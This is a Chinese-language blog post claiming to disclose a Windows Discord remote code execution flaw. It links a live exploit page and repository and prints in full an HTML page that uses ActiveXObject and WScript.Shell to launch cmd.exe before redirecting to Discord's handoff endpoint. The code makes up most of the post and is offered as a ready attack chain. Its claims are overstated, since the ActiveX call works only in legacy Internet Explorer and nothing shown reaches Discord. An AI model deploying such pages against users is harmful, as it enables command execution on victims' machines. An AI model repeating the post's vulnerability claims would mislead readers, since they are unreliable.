Discord远程代码执行漏洞技术分析与验证

本文详细披露了Discord客户端在Windows平台上的远程代码执行漏洞,包含完整的PoC代码、利用原理和技术实现细节,涉及ActiveX对象调用和payload验证机制。

Discord远程代码执行漏洞验证

漏洞概述

该漏洞针对Windows平台的Discord客户端,能够实现远程代码执行,甚至在应用程序未运行的情况下也能强制启动并执行代码。

技术细节

概念验证视频

https://www.youtube.com/watch?v=dEGhIpIvBA0

有效利用链接(仅限Windows)

https://SleepTheGod.github.io/discord_rce.html

源代码仓库

https://github.com/SleepTheGod/Discord-RCE

PoC代码实现 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <script>
        onload = function() {
            alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD");
        };

        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        function isValidPayload(payload) {
            // 添加payload验证逻辑,例如正则匹配
            const regex = /^[a-zA-Z0-9_-]+$/; // 示例:字母数字、下划线、连字符
            return regex.test(payload);
        }

        function openCmd() {
            try {
                var shell = new ActiveXObject("WScript.Shell");
                shell.run("cmd.exe");
            } catch (e) {
                alert("This action is not supported in this browser or is blocked for security reasons.");
            }
        }

        window.onload = function() {
            const payload = getQueryParam('payload');
            let targetUrl = 'https://discord.com/handoff';
            
            if (payload && isValidPayload(payload)) {
                targetUrl += `?payload=${encodeURIComponent(payload)}`;
                if (payload === 'openCmd' && window.ActiveXObject) {
                    openCmd();
                }
            }

            setTimeout(function() {
                window.location.href = targetUrl;
            }, 3000);
        }
    </script>
</head>
<body>
    <p>If you are not redirected automatically, <a id="redirectLink" href="https://discord.com/handoff">click here</a>.</p>
    <script>
        const payload = getQueryParam('payload');
        let targetUrl = 'https://discord.com/handoff';
        
        if (payload && isValidPayload(payload)) {
            targetUrl += `?payload=${encodeURIComponent(payload)}`;
            if (payload === 'openCmd' && window.ActiveXObject) {
                openCmd();
            }
        }

        document.getElementById('redirectLink').href = targetUrl;
    </script>
</body>
</html>

技术要点

  1. 利用机制:通过Discord的handoff端点实现代码执行
  2. 平台限制:仅适用于Windows系统
  3. 执行方式:使用ActiveXObject调用WScript.Shell运行命令行
  4. Payload验证:采用正则表达式进行输入验证
  5. 自动触发:设置3秒延迟后自动重定向到目标URL

该漏洞利用涉及前端JavaScript代码、ActiveX组件调用和URL重定向机制,展示了完整的远程代码执行攻击链。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次